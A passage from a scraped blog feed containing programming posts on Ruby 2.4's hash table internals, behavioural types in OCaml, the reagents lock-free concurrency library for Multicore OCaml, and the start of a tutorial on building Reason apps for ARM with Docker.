@total=0.8499999999999993>\n\n\nThe above two operations executed ~3 times faster on my laptop. Though these numbers can vary with your machine and processor, the performance improvements will be significant on all modern processors. Not all operations became 3 times faster; the average performance improvement is more than 50%.\nHash Table\n\nIn computing, a hash table (hash map) is a data structure that is used to implement an associative array, a structure that can map keys to values. A hash table uses a hash function to compute an index into an array of buckets or slots, from which the desired value can be found. Wikipedia\n\n\nIn other words, it is a data structure that allows you to store key-value pairs and helps to fetch specific data using the key in an efficient way. Unlike arrays, you don’t have to iterate through all elements to find a given element in the hash. If you are new to this data structure, check this for a better understanding.\n\nhash = {key1: value1, key2: value2}\n\n\nPre Ruby 2.4\nLet’s first check how Ruby implemented Hash pre 2.4 (diagram: old hash representation).\n\nRuby internally uses a structure called st_table to represent a hash. st_table contains the type, the number of bins, the number of entries and a pointer to the bin array. The bin array has a default size of 11 and can grow when required. 
Let’s take an example hash and see how it is represented using the above diagram.\n\nsample_hash = {a: 10, b: 20, c: 30, d: 40, e: 50}\n\n\nLet’s take the keys :c and :d.\nStep 1:\nThe first thing Ruby does is take the hash of the key using the internal hash function.\n\n2.3.1 :075 > :c.hash\n=> 2782\n2.3.1 :076 > :d.hash\n=> 2432\n\n\nStep 2:\nAfter getting the hash value, Ruby takes it modulo 11 to figure out in which bin it can store the given pair.\n\n2.3.1 :073 > :c.hash % 11\n=> 10\n2.3.1 :074 > :d.hash % 11\n=> 1\n\n\nThis means we can put :c => 30 in the 10th bin and :d in the 1st bin.\nStep 3:\nWhat if multiple keys produce the same modulo result? This is called a hash collision. To resolve this, Ruby uses a separate chaining approach, i.e., it makes a doubly linked list and adds it to the existing value in the bin.\nStep 4:\nWhat if the hash is too large? The linked lists will start growing and make the hash slower. So, Ruby will allocate more bins and perform an operation called rehashing to utilise the newly added bins.\nImprovements in 2.0\nIn Ruby 2.0, the need for extra data structures was eliminated for smaller hashes, which use a linear search for better performance.\nImprovements in 2.2\nSince 2.2.0, Ruby has used bin array sizes that correspond to powers of two (16, 32, 64, 128, …).\nChanges in 2.4\n(diagram: new hash structure in Ruby 2.4)\n\nSource: https:\u002F\u002Fgithub.com\u002Fruby\u002Fruby\u002Fblob\u002Ftrunk\u002Fst.c\nIn Ruby 2.4, the hash table moved to an open addressing model, i.e., there is no longer a separate doubly linked list for collision resolution. Records are stored in the entries array itself, so there is no pointer chasing and data is stored in adjacent memory locations (data locality). The hash table has two arrays called bins and entries. The entries array contains hash entries in insertion order, and the bins array provides access to entries by their keys. The key hash is mapped to a bin containing the index of the corresponding entry in the entries array.\nInserting entries in Hash\nStep 1:\nRuby will insert an entry into the entries array in sequential order.\nStep 2:\nRuby will identify the bin to which the entry is to be mapped. Ruby uses the first few bits of the hash as the bin index. Explaining the whole process is beyond the scope of this article; you can check the logic in the MRI source code here.\nAccessing an element by key\nLet’s examine it with a sample hash **\n\nsample_hash = {a: 10, b: 20, c: 30, d: 40, e: 50}\n\n\nHere, Ruby will create two internal arrays, entries and bins, as shown below.\n\nentries = [[2297,a,10], [451,b,20], [2782,c,30], [2432,d,40],[1896,e,50]]\n\n\nEach record in the entries array contains a hash, key, and value respectively.\nThe default bin size in Ruby is 16, so the bins array for the above hash will look somewhat like this:\n\nbins = [\n3,\nnil,\nnil,\nnil,\n1,\nnil,\nnil,\nnil,\n5,\n0,\nnil,\nnil,\nnil,\nnil,\n2,\nnil\n]\n\n\nNow, what if we want to fetch an element from the hash, say :c?\n\nsample_hash[:c]\n\n\nStep 1:\nFind the hash using Ruby’s internal hash function.\n\n:c.hash\n2782\n\n\nStep 2:\nFind the location in the bins array using the find_bin method.\n\nfind_bin(2782)\n\n\nStep 3:\nFind the location in the entries array using the bins array.\n\nbins[14] => 2\n\n\nStep 4: 
Find the entry using the index we got.\n\nentries[2] => [2782,c,30]\n\n\nNow we have the value for the key :c without iterating through all the records.\nDeleting an item\nIf the item to be deleted is the first one, then Ruby will change the index of the ‘current first entry’; otherwise, Ruby will mark the item as deleted using a reserved hash value.\nIn the Ruby source code, DELETED is marked using 0 and EMPTY is marked using 1.\nTo summarise, this approach made the hash implementation in Ruby faster because the new bins array stores much smaller references to the entries instead of storing the entries themselves. Hence, it can take advantage of modern processors’ cache hierarchies.\n** Small hashes use a linear search to find entries from Ruby 2.0 onwards, to avoid extra overhead and improve performance. The given example is for reference only.\nReferences\nhttps:\u002F\u002Fbugs.ruby-lang.org\u002Fissues\u002F12142\nhttps:\u002F\u002Fblog.heroku.com\u002Fruby-2-4-features-hashes-integers-rounding#hash-changes\nhttps:\u002F\u002Fen.wikipedia.org\u002Fwiki\u002FHash_table\nhttp:\u002F\u002Fpatshaughnessy.net\u002Fruby-under-a-microscope",[],{"slug":2668,"title":2669,"link":2670,"pubDate":2671,"contentSnippet":2672,"tags":2673,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"behavioural-types","Behavioural types","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Ftypes\u002F2016\u002F06\u002F30\u002Fbehavioural-types\u002F","2016-06-30T09:31:00.000Z","Behavioural types such as session types, contracts and choreography describe the\nbehaviour of a software entity as a sequence of operations on a resource such\nas a communication channel, web service session or a file descriptor.\nBehavioural types capture well-defined interactions, which are enforced\nstatically with the help of type system machinery. In this post, I will describe\na lightweight embedding of behavioural types in OCaml using polymorphic variants\nthrough a series of examples. The complete source code for the examples is\navailable\nhere.\nThe idea of encoding behavioural types using polymorphic variants comes from\nFuSe, which is a\nsimple library implementation of binary sessions in OCaml. Similar to FuSe,\nlinear use of resources is enforced through dynamic checks in the following\nexamples. We’ll raise LinearityViolation when linearity is violated.\n\nexception LinearityViolation\n\n\nRefs that explain their work\nLet us define a ref type that is constrained not only by the type of value\nthat it can hold but also by the sequence of operations that can be performed\non it.\n\nmodule type Ref =\nsig\n  type ('a, 'b) ref constraint 'b = [>]\n\n  val ref   : 'a -> ('a, 'b) ref\n  val read  : ('a, [`Read of 'b]) ref -> 'a * ('a, 'b) ref\n  val write : ('a, [`Write of 'b]) ref -> 'a -> ('a, 'b) ref\nend\n\nmodule Ref : Ref = struct ... end\n\n\nThe phantom type variable 'b constrained to be a polymorphic variant ('b =\n[>]) describes the sequence of permitted operations. For example, a reference\ncan only be read when the type presents the read capability [`Read of 'b].\nHere, the 'b represents the behaviour of the continuation. Consequently, the\nresult of the read operation is a tuple consisting of the value read and a\nreference whose type is ('a,'b) ref. It is useful to think of the read\noperation as changing the type of the reference. The type for write is\nsimilar.\nAssociating behaviours with references is quite handy. 
For example, below is a\nreference that holds an integer, which can only be written once, following which\na single read is permitted:\n\nlet my_ref1 : (int, [`Write of [`Read of [`Stop]]]) Ref.ref = Ref.ref 10\n\n\nThe behavioural types are also automatically inferred. For example,\n\nutop # let foo1 r =\n  let r = Ref.write r 20 in\n  Ref.read r;;\nval foo1 :\n  (int, [ `Write of [ `Read of [>  ] as 'a ] ]) Ref.ref ->\n  int * (int, 'a) Ref.ref\n\n\nThe inferred type says that foo1 writes into r and then reads it. We can\napply foo1 to my_ref1 as their behaviours are compatible.\n\nutop # let v,res_ref = foo1 my_ref1;;\nval v : int = 20\nval res_ref : (int, [ `Stop ]) Ref.ref\n\n\nRecursive behavioural types are obtained painlessly.\n\nutop # let rec foo2 r =\n  let r = Ref.write r 20 in\n  let v, r = Ref.read r in\n  foo2 r;;\nval foo2 : (int, [ `Write of [ `Read of 'a ] ] as 'a) Ref.ref -> 'b\n\n\nThe inferred type says that foo2 repeatedly writes to and then reads the given\nreference. Incompatible references are rejected statically. For example,\n\nutop # let my_ref2 : (int, [`Write of [`Read of [`Stop]]]) Ref.ref = Ref.ref 10;;\nval my_ref2 : (int, [ `Write of [ `Read of [ `Stop ] ] ]) Ref.ref = \u003Cabstr>\nutop # let _ = foo2 my_ref2;;\nError: This expression has type\n         (int, [ `Write of [ `Read of [ `Stop ] ] ]) Ref.ref\n       but an expression was expected of type\n         (int, [ `Write of [ `Read of 'a ] ] as 'a) Ref.ref\n       These two variant types have no intersection\n\n\nwhereas\n\nutop # let my_ref3 = Ref.ref 10;;\nval my_ref3 : (int, _[>  ]) Ref.ref = \u003Cabstr>\nutop # let _ = foo2 my_ref3;;\n\n\nis accepted and runs forever. It is (sometimes) useful to write programs that\ndon’t always run forever, such as foo3:\n\nutop # let rec foo3 r = function\n  | 0 ->\n      print_endline \"done\";\n      Ref.read r\n  | n ->\n      let r = Ref.write r 20 in\n      let v, r = Ref.read r in\n      foo3 r (n-1);;\n\n\nwhich runs for n iterations, performing a write and a read in every\niteration but the last, where it just performs a read. Unfortunately, this\nprogram does not type check:\n\nError: This expression has type ('a, [ `Read of [>  ] ]) Ref.ref\n       but an expression was expected of type ('a, [ `Write of [>  ] ]) Ref.ref\n       These two variant types have no intersection\n\n\nThe problem is that the behaviours of the two branches are incompatible, and the\nprogram is rightly rejected. We distinguish the branches in the type using:\n\nval branch : ('a, [>] as 'b) ref -> (('a, [>] as 'c) ref -> 'b) -> ('a, 'c) ref\n\n\nbranch r f indicates branch selection in r, where f is a function that is\nalways of the form fun x ->  `Tag x. 
The fixed version of foo3 is:\n\nutop # let rec foo3 r = function\n  | 0 ->\n      print_endline \"done\";\n      Ref.write (Ref.branch r (fun x -> `Zero x)) 0\n  | n ->\n      let r = Ref.write (Ref.branch r (fun x -> `Succ x)) 20 in\n      let v, r = Ref.read r in\n      foo3 r (n-1);;\nval foo3 :\n  (int,\n   [> `Succ of (int, [ `Write of [ `Read of 'a ] ]) Ref.ref\n    | `Zero of (int, [ `Write of [>  ] as 'b ]) Ref.ref ]\n   as 'a)\n  Ref.ref -> int -> (int, 'b) Ref.ref = \u003Cfun>\n\n\nObserve that the inferred type captures the branching behaviour, and works as\nexpected:\n\nutop # let my_ref4 = Ref.ref 10 in foo3 my_ref4 32;;\ndone\n- : (int, _[>  ]) Ref.ref = \u003Cabstr>\n\n\nImplementation\nThe implementation is unremarkable except for the machinery to dynamically\nenforce linearity.\n\nmodule Ref : Ref =\nstruct\n\n  type ('a, 'b) ref =\n    {contents     : 'a;\n     mutable live : bool} (* For linearity *)\n     constraint 'b = [>]\n\n  let ref v = {contents = v; live = true}\n\n  let check r =\n    if not r.live then raise LinearityViolation;\n    r.live \u003C- false\n\n  let fresh r = {r with live = true}\n\n  let read r =\n    check r;\n    (r.contents, fresh r)\n\n  let write r v =\n    check r;\n    { contents = v; live = true }\n\n  let branch r _ = check r; fresh r\nend\n\n\nBehavioural types crucially depend on linear use of the resources. Since OCaml\ndoes not have linear types, there is nothing that prevents writing the following\nfunction that seemingly violates the behavioural contract.\n\nutop # let foo (r : (int, [`Read of [`Stop]]) Ref.ref) =\n         let _, _ = Ref.read r in\n         Ref.read r;;\nval foo :\n  (int, [ `Read of [ `Stop ] ]) Ref.ref -> int * (int, [ `Stop ]) Ref.ref =\n  \u003Cfun>\n\n\nWhile the type of r says that it will be read only once, the function foo\nreads it twice. This non-linear use of r is caught dynamically; the second\nread of r raises LinearityViolation.\n\nutop # let _ = foo (Ref.ref 10);;\nException: LinearityViolation.\n\n\nPolymorphic References\nSince we can accurately track the behaviour of references, we can safely allow\ndifferently typed values to be written to and read from the reference. A reference\nthat holds a value of type t can be read multiple times at t before being\nwritten at type u. This protocol is captured by the following type:\n\nmodule type PolyRef =\nsig\n  type ('a,'b) rw_prot\n    constraint 'b = [> `Read of 'a * 'b | `Write of 'c * ('c,_) rw_prot]\n  type 'c ref constraint 'c = ('a,'b) rw_prot\n  ...\nend\n\n\nAs before, the reference holds values of 'a with the behaviour given by 'b.\nThe reference can either be read multiple times at 'a or written once at 'c,\nafter which the reference holds values of type 'c. 
The rest of the operations\nare defined as usual:\n\nmodule type PolyRef =\nsig\n  ...\n  val ref  : 'a -> ('a,'b) rw_prot ref\n  val read  : ('a,[> `Read of 'a * 'b]) rw_prot ref -> 'a * ('a,'b) rw_prot ref\n  val write : ('a,[> `Write of 'b * ('b,'c) rw_prot]) rw_prot ref -> 'b ->\n    ('b,'c) rw_prot ref\n  val branch : ('a, [>] as 'b) rw_prot ref -> (('a, [>] as 'c) rw_prot ref -> 'b) ->\n    ('a, 'c) rw_prot ref\nend\n\n\nWe can now write interesting programs:\n\nutop # let rec foo r =\n  let v,r = read r in\n  let r = write r (string_of_int (v+1)) in\n  let v,r = read r in\n  let r = write r (int_of_string v) in\n  foo r;;\nval foo :\n  (int,\n   [> `Read of int * 'a\n    | `Write of\n        string *\n        (string,\n         [> `Read of string * 'b | `Write of int * (int, 'a) rw_prot ] as 'b)\n        rw_prot ]\n   as 'a)\n  rw_prot PolyRef.ref -> 'c = \u003Cfun>\n\n\nObserve that foo reads r as an integer, updates it as a string, reads it as\na string, and finally writes an integer into it. The inferred type\nreflects this change from int -> string -> int. The implementation of\npolymorphic references uses the unsafe Obj.magic to coerce the contents.\nHowever, the behavioural types ensure that accesses are safe.\n\nmodule PolyRef : PolyRef =\nstruct\n  type ('a,'b) rw_prot\n    constraint 'b = [> `Read of 'a * 'b | `Write of 'c * ('c,_) rw_prot]\n\n  type 'a ref =\n    {contents     : 'b.'b;\n     mutable live : bool} (* For linearity *)\n     constraint 'a = ('b,'c) rw_prot\n\n  let ref v = {contents = Obj.magic v; live = true}\n\n  let check r =\n    if not r.live then raise LinearityViolation;\n    r.live \u003C- false\n\n  let fresh r = {r with live = true}\n\n  let read r =\n    check r;\n    (Obj.magic r.contents, fresh r)\n\n  let write r v =\n    check r;\n    { contents = Obj.magic v; live = true }\n\n  let branch r _ = check r; fresh r\nend\n\n\nFile descriptors\nWe can utilise behavioural types to apply meaningful restrictions to operations\non file descriptors.\n\nmodule type File_descriptor = sig\n  type 'a t constraint 'a = [>]\n\n  val openfile : string -> Unix.open_flag list -> Unix.file_perm ->\n    ([\u003C `Close | `Write of 'a | `Read of 'a > `Close] as 'a) t\n  val close : [> `Close] t -> unit\n  val read : [> `Read of 'a] t -> bytes -> int -> int -> int * 'a t\n  val write : [> `Write of 'a] t -> bytes -> int -> int -> int * 'a t\n  val mk_read_only  : [> `Read of 'a] t -> ([`Close | `Read of 'a] as 'a) t\n  val mk_write_only : [> `Write of 'a] t -> ([`Close | `Write of 'a] as 'a) t\n\n  val open_stdin  : unit -> ([`Close | `Read of 'a] as 'a) t\n  val open_stdout : unit -> ([`Close | `Write of 'a] as 'a) t\n  val open_stderr : unit -> ([`Close | `Write of 'a] as 'a) t\nend\n\n\nThe File_descriptor module is a thin wrapper around the file descriptors from\nthe Unix module. The file descriptor obtained through openfile permits a subset\nof the operations read, write and close. The precise set of capabilities is\ndictated by the flags supplied. For example, with O_RDONLY the type of the\nfile descriptor obtained should be ([`Close | `Read of 'a] as 'a) t. The\ntypes of the standard streams are also restricted. 
For example,\n\nutop # open_stderr () |> fun fd -> write fd \"hello\\n\" 0 6;;\nhello\n- : int * ([ `Close | `Write of 'a ] as 'a) t = (6, \u003Cabstr>)\nutop # open_stdin () |> fun fd -> write fd \"hello\\n\" 0 6;;\nError: This expression has type ([ `Close | `Read of 'a ] as 'a) t\n       but an expression was expected of type [> `Write of [>  ] ] t\n       The first variant type does not allow tag(s) `Write\n\n\nFile descriptors can also be made read-only or write-only.\n\nutop # let foo fd =\n         let _, fd = write fd  \"hello\\n\" 0 6 in\n         let fd = mk_read_only fd in\n         write fd \"hello\\n\" 0 6;;\nError: This expression has type ([ `Close | `Read of 'a ] as 'a) t\n       but an expression was expected of type [> `Write of [>  ] ] t\n       The first variant type does not allow tag(s) `Write\n\n\nThe implementation of the module is straightforward.\n\nmodule File_descriptor : File_descriptor = struct\n  open Unix\n\n  type 'a t =\n    {fd : file_descr;\n     mutable live : bool} constraint 'a = [>]\n\n  let mk fd = {fd = fd; live = true}\n\n  let fresh fd = {fd with live = true}\n\n  let check fd =\n    if not fd.live then raise LinearityViolation;\n    fd.live \u003C- false\n\n  let open_stdin () = mk stdin\n  let open_stdout () = mk stdout\n  let open_stderr () = mk stderr\n\n  let openfile file flags perm =\n    let fd = openfile file flags perm in\n    mk fd\n\n  let close fd = check fd; close fd.fd\n\n  let read fd buff ofs len =\n    check fd;\n    (read fd.fd buff ofs len, fresh fd)\n\n  let write fd buff ofs len =\n    check fd;\n    (write fd.fd buff ofs len, fresh fd)\n\n  let mk_read_only fd = check fd; fresh fd\n  let mk_write_only fd = check fd; fresh fd\nend\n\n\n\nTracking Aliases\nThe final example I will discuss is alias tracking.\n\nmodule type Alias = sig\n  type ('a,'b) t constraint 'b = [>]\n  val make   : (unit -> 'a) -> ('a, [`One]) t\n  val dup    : ('a, 'b) t -> ('a,[`Succ of 'b]) t * ('a, [`Succ of 'b]) t\n  val merge  : ('a, [`Succ of 'b]) t -> ('a, [`Succ of 'b]) t -> ('a, 'b) t\n  val free   : ('a, [`One]) t -> ('a -> unit) -> unit\n  val app    : ('a,'b) t -> ('a -> unit) -> unit\nend\n\nmodule Alias : Alias = struct\n  type ('a,'b) t =\n    {v : 'a; mutable live : bool} constraint 'b = [>]\n\n  let fresh a = {a with live = true}\n\n  let check a =\n    if not a.live then raise LinearityViolation;\n    a.live \u003C- false\n\n  let make f = {v = f (); live = true}\n  let dup x = check x; (fresh x, fresh x)\n  let merge x y = check x; check y; fresh x\n  let free x f = check x; f x.v\n  let app x f = f x.v\nend\n\n\nThe type variable 'b tracks aliases as a depth in the aliasing tree. New\nresources are initialised with make, and the resultant resource has type\n('a,[`One]) t indicating that there is just one reference to this resource.\nAliases are created explicitly with dup, which destroys the original\nreference and returns two new references, each one level deeper than the\noriginal reference. Two references from the same level can be merged together\nto obtain a reference at the next higher level, destroying the\noriginal references in the process. 
All of this machinery is to ensure that the resource can\nonly be freed when there is a unique reference.\n\nutop # let r = make (fun _ -> ref 0);;\nval r : (int ref, [ `One ]) t = \u003Cabstr>\nutop # let r1,r2 = dup r;;\nval r1 : (int ref, [ `Succ of [ `One ] ]) t = \u003Cabstr>\nval r2 : (int ref, [ `Succ of [ `One ] ]) t = \u003Cabstr>\nutop # let r11,r12 = dup r1;;\nval r11 : (int ref, [ `Succ of [ `Succ of [ `One ] ] ]) t = \u003Cabstr>\nval r12 : (int ref, [ `Succ of [ `Succ of [ `One ] ] ]) t = \u003Cabstr>\nutop # let r21, r22 = dup r2;;\nval r21 : (int ref, [ `Succ of [ `Succ of [ `One ] ] ]) t = \u003Cabstr>\nval r22 : (int ref, [ `Succ of [ `Succ of [ `One ] ] ]) t = \u003Cabstr>\nutop # let r1 = merge r11 r22;;\nval r1 : (int ref, [ `Succ of [ `One ] ]) t = \u003Cabstr>\nutop # let r2 = merge r12 r21;;\nval r2 : (int ref, [ `Succ of [ `One ] ]) t = \u003Cabstr>\nutop # free (merge r1 r2);;\n- : (int ref -> unit) -> unit = \u003Cfun>\n\n\nConclusion\nPolymorphic variants are quite effective in encoding behavioural types.\nHowever, the absence of linear types in OCaml makes us resort to dynamic tests\nfor linear use of resources. While it is possible to hide the resource under a\nmonad, combining the use of multiple resources would require monad\ntransformers, which are well known to be quite heavyweight in terms of\nprogrammability. Perhaps an effect system would do the trick.",[],{"slug":2675,"title":2676,"link":2677,"pubDate":2678,"contentSnippet":2679,"tags":2680,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"lock-free","Lock-free programming for the masses","https:\u002F\u002Fkcsrk.info\u002Focaml\u002Fmulticore\u002F2016\u002F06\u002F11\u002Flock-free\u002F","2016-06-11T09:08:00.000Z","Efficient concurrent programming libraries are essential for taking advantage of\nfine-grained parallelism on multicore hardware. In this post, I will introduce\nreagents, a composable, lock-free\nconcurrency library for expressing fine-grained parallel programs on Multicore\nOCaml. Reagents offer a\nhigh-level DSL for experts to specify efficient concurrency libraries, but also\nallow the consumers of the libraries to extend them further without knowing the\ndetails of the underlying implementation.\nMotivation\nDesigning and implementing scalable concurrency libraries is an enormous\nundertaking. Decades of research and industrial effort have led to\nstate-of-the-art concurrency libraries such as\njava.util.concurrent\n(JUC) for the JVM and\nSystem.Collections.Concurrent\n(SCC) for the .NET framework. These libraries are often written by experts and\nhave subtle invariants, which makes them hard to maintain and improve. Moreover,\nit is hard for the library user to safely combine multiple atomic operations.\nFor example, while JUC and SCC provide atomic operations on stacks and queues,\nsuch atomic operations cannot be combined into larger atomic operations.\nOn the other hand, software transactional memory (STM) offers\ncomposability,\nbut STM based data structures are generally less efficient than their lock-free\ncounterparts, especially when there are moderate to high levels of contention.\nAaron Turon introduced\nreagents, an expressive and\ncomposable library which retains the performance and scalability of lock-free\nprogramming. Reagents allow isolated atomic updates to shared state, as well as\nmessage passing communication over channels. 
Furthermore, reagents provide a set\nof combinators for sequential composition à la STM, parallel composition\nà la Join calculus, and\nselective communication à la Concurrent\nML, while being lock-free.\nReagents occupy this sweet-spot between expressivity and performance, and we\nbelieve they could serve as a great default1 for writing fine-grained\nconcurrent programs in Multicore OCaml.\nCombinators\nThe basic reagent combinators are presented below.\ntype ('a,'b) t\n\n(* channel communication *)\nval swap : ('a,'b) endpoint -> ('a,'b) t\n\n(* shared memory *)\nval upd : 'a ref -> ('a -> 'b -> ('a * 'c) option) -> ('b,'c) t\n\n(* sequential composition *)\nval (>>>) : ('a,'b) t -> ('b,'c) t -> ('a,'c) t\n(* conjunction *)\nval (\u003C*>) : ('a,'b) t -> ('a,'c) t -> ('a,'b * 'c) t\n(* disjunction *)\nval (\u003C+>) : ('a,'b) t -> ('a,'b) t -> ('a,'b) t\n\nval run : ('a,'b) t -> 'a -> 'b\n\n\nA reagent value with type ('a,'b) t represents an atomic transaction that\ntakes an input of type 'a and returns a value of type 'b. The basic atomic\noperations are exchanging messages on an endpoint of a channel through swap and\nupdating a shared reference through upd. The swap operation blocks the\ncalling thread until a matching swap operation is available on the dual\nendpoint.\nThe atomic reference update operation upd takes a function which is applied\nto the current value of the reference (of type 'a) and the input value (of\ntype 'b), and is expected to return an optional pair of the new value for the\nreference and a return value (of type 'c). If the update function returns\nNone, then the invoking thread blocks until the reference is updated. The reagent\nimplementation takes care of the blocking and signalling necessary for thread\nwakeup.\nThe most important feature of reagents is that they allow composition of reagent\ntransactions in sequence >>> and in parallel \u003C*>, and also to selectively\nchoose one of the available operations \u003C+>. Furthermore, these combinators,\nbeing arrows, enable\noptimisations that cover the common case and help reagents achieve performance\ncommensurate with hand-written implementations. The reagents library also exposes\nmonadic combinators for convenience, at the cost of forgoing optimisation\nopportunities.\nA lock-free stack\nThe following is a reagent implementation of the Treiber lock-free\nstack.\nmodule R = Reagent\n\nmodule TreiberStack : sig\n  type 'a t\n  val create  : unit -> 'a t\n  val push    : 'a t -> ('a, unit) R.t\n  val pop     : 'a t -> (unit, 'a) R.t\n  val try_pop : 'a t -> (unit, 'a option) R.t\nend = struct\n  type 'a t = 'a list R.ref\n\n  let create () = R.ref []\n\n  let push r =\n    R.upd r (fun xs x -> Some (x::xs,()))\n\n  let try_pop r = R.upd r (fun l () ->\n    match l with\n    | [] -> Some ([], None)\n    | x::xs -> Some (xs, Some x))\n\n  let pop r = R.upd r (fun l () ->\n    match l with\n    | [] -> None\n    | x::xs -> Some (xs,x))\nend\n\n\nWe utilise a shared reference of type 'a list R.ref to represent the stack and\nuse the upd operation to perform atomic operations on the stack. The important\ntakeaway from this snippet is that the code is no more complicated than a\nsequential stack implementation. The logic for backoff, retry, blocking and\nsignalling is hidden behind the reagents implementation. In particular, the\npop operation blocks the calling thread until the stack is non-empty. 
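As a usage sketch, assuming the modules above are in scope (in the real library, reagents must be run from threads managed by a scheduler, which is elided here):\n\nlet example () =\n  let s = TreiberStack.create () in\n  (* Atomically push a value onto the stack. *)\n  R.run (TreiberStack.push s) 42;\n  (* Atomically pop it; pop would block if the stack were empty. *)\n  let v = R.run (TreiberStack.pop s) () in\n  assert (v = 42)\n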
Thus,\nexperts can write efficient concurrency libraries using reagents while\npreserving the readability (and as a consequence maintainability) of the code.\nFurthermore, since the stack interface is exposed as reagents, the individual\noperations can be further composed. For example, given two Treiber stacks s1\nand s2, pop s1 >>> push s2 transfers elements atomically between the stacks,\npop s1 \u003C*> pop s2 consumes elements atomically from both of the stacks, and\npop s1 \u003C+> pop s2 consumes an element from either of the stacks. Importantly,\nthe composition preserves the optimisations and blocking\u002Fsignalling behaviours,\nallowing the users of the library to arbitrarily combine and extend the\nfunctionality without knowing about the underlying implementation.\nFeeding the philosophers\nThe parallel composition combinator provides an elegant way to solve the Dining\nPhilosophers\nproblem. The problem\nimagines a set of philosophers seated around a circular table, forever\nalternating between thinking and eating. Forks are placed between adjacent\nphilosophers, and each philosopher can only eat after obtaining both the left\nand right forks. The goal is to design a solution where no philosopher will\nstarve. The problem highlights the issues of deadlock and fairness in concurrent\nprogramming.\nOne way to solve this problem is to model each fork as a pair of endpoints, one\nfor taking and another for dropping the fork.\ntype fork =\n  {drop : (unit,unit) endpoint;\n   take : (unit,unit) endpoint}\n\nlet mk_fork () =\n  let drop, take = mk_chan () in\n  {drop; take}\n\nlet drop f = swap f.drop\nlet take f = swap f.take\n\n\nNow, the solution for a single round of eating can be implemented as follows:\nlet eat l_fork r_fork =\n  ignore @@ run (take l_fork \u003C*> take r_fork) ();\n  (* ...\n   * eat\n   * ... *)\n  spawn @@ run (drop l_fork);\n  spawn @@ run (drop r_fork)\n\n\nWe use take l_fork \u003C*> take r_fork to atomically take both of the forks.\nReagents ensure that the protocol does not deadlock. After eating, we release\nthe forks by spawning lightweight threads. In the next round, the philosophers\nrace for the available forks. If the thread scheduler is fair, then the\nprotocol provides fairness among the philosophers. The complete solution is\navailable\nhere.\nImplementation\nThe key idea behind the implementation is that a reagent transaction executes\nin two phases. The first phase involves collecting all the compare-and-swap\n(CAS) operations necessary for the transaction, and the second phase is invoking\na k-CAS operation (emulated in software). The failure to gather all the\navailable CASes constitutes a permanent failure, causing the thread to explore\nother alternatives in the case of a selective communication, or block otherwise.\nA failure in the second phase means that there is active interference from\nother concurrent threads, in which case the transaction is retried.\nThe performance of reagents depends critically on having fine-grained control\nover threads and schedulers for implementing backoff loops, blocking and\nsignalling. However, one of the main ideas of Multicore OCaml is not to bake\nthe thread scheduler into the compiler but rather to describe schedulers as libraries. 
To\nthis end, the reagents library is functorized over the following generic\nscheduler interface:\nmodule type Scheduler = sig\n  (* continuation *)\n  type 'a cont\n  effect Suspend : ('a cont -> 'a option) -> 'a\n  effect Resume  : 'a cont * 'a -> unit\nend\n\n\nThe interface itself only describes the scheduler’s effects, whose behaviour is\ndefined by the\nhandlers.\nperform (Suspend f) applies f to the current continuation, and allows the\nreagent library to stash the thread on the unavailable resource’s wait queue.\nThe return type of f is an option to handle the case where the resource might\nhave become available while suspending. If f returns None, then control\nreturns to the scheduler. Once the resource becomes available, the reagent\nlibrary performs the Resume effect to resume the suspended thread.\nComparison to STM\nReagents are less expressive than STM, which provides serializability. But in\nreturn, reagents provide a stronger progress guarantee (lock-freedom) than STM\n(obstruction-freedom)2. A reagent transaction operating more than once on\nthe same memory location will fail at runtime. Abstractly, this behaviour is\ndisallowed since it cannot be represented as a k-CAS operation. Due to this\nrestriction, the transaction pop s1 >>> push s1 always fails, which prohibits\nimportant patterns such as atomically pushing or popping multiple values from\nthe same stack. I am currently working on extending the reagents semantics to\nrelax this invariant. The resultant behaviour will be similar to a version of\nsnapshot isolation. While this is weaker than the serializability semantics offered\nby STM, we will retain the benefit of lock-freedom.\nContribute!\nUsing the reagents library, we have implemented a collection of composable\nconcurrent data and synchronization structures such as stacks, queues, countdown\nlatches, reader-writer locks, condition variables, exchangers, atomic counters,\netc. There is a great opportunity here to build a standard library for\nfine-grained parallelism for Multicore OCaml, incorporating the latest\ndevelopments in lock-free data structures. There is still work to be done\noptimising the implementation to remove allocations on the fast path, and\nfine-tuning the reagents core.\nContributions to the library are most\nwelcome, and are a great way to contribute to the Multicore OCaml effort. Please\ndo file those issues and submit pull-requests.\nReagents is just a library, and you can implement your own favourite concurrent programming library. ↩\nAnd then there are good arguments as to why the semantics should be even weaker. ↩",[],{"slug":2682,"title":2683,"link":2684,"pubDate":2685,"contentSnippet":2686,"tags":2687,"maintainerName":349,"maintainerUsername":350,"maintainerPhoto":351,"feedUrl":352},"armed-with-reason","Armed with Reason","https:\u002F\u002Fkcsrk.info\u002Freason\u002Farm\u002F2016\u002F05\u002F16\u002Farmed-with-reason\u002F","2016-05-16T10:00:05.000Z","This is a short tutorial on how to build\nReason apps for an ARM target with the help\nof Docker. I am using Docker for\nMac, which is\nstill in beta. Using Docker for development has two important\nadvantages over traditional cross-compilation. First, the Reason toolchain comes\npackaged as a Docker image and hence no local installation is necessary.\nSecondly, cross-compilers are often tricky to get right. 
Docker for Mac comes\nwith multiarch support and hence removes the need for traditional\ncross-compilation.\nSetup\nI will be testing using a Cubietruck\nrunning Linaro Desktop. But these instructions should also work for\nRaspbian, a Debian variant optimized for Raspberry Pi\nhardware.\nBuild\nFirst, get the Dockerfile for the Reason toolchain and build the image.\n$ mkdir \u002Ftmp\u002Freason_arm\n$ cd \u002Ftmp\u002Freason_arm\n$ wget https:\u002F\u002Fgist.githubusercontent.com\u002Fkayceesrk\u002Fdc37a6ffeeda2dea338550dd4e8ad7ec\u002Fraw\u002F8e136b8b8170758bd5e9c0cacf70fed4f9ce3df1\u002FDockerfile\n$ docker build -t reason-arm .\n\n\nAll set! Let’s build a “Hello, World!” program.\n$ mkdir \u002Ftmp\u002Freason_arm_hello\n$ cd \u002Ftmp\u002Freason_arm_hello\n$ echo 'print_endline \"Hello, Reason!\"' > hello.re\n$ docker run -it -v `pwd`:\u002Fsrc reason-arm\n$ cd \u002Fsrc\n$ rebuild hello.native\n^C\n\n\nThe build artifacts are found in the host machine’s \u002Ftmp\u002Freason_arm_hello\u002F_build directory.\n$ file _build\u002Fhello.native\n_build\u002Fhello.native: ELF 32-bit LSB executable, ARM, version 1 (SYSV), dynamically linked (uses shared 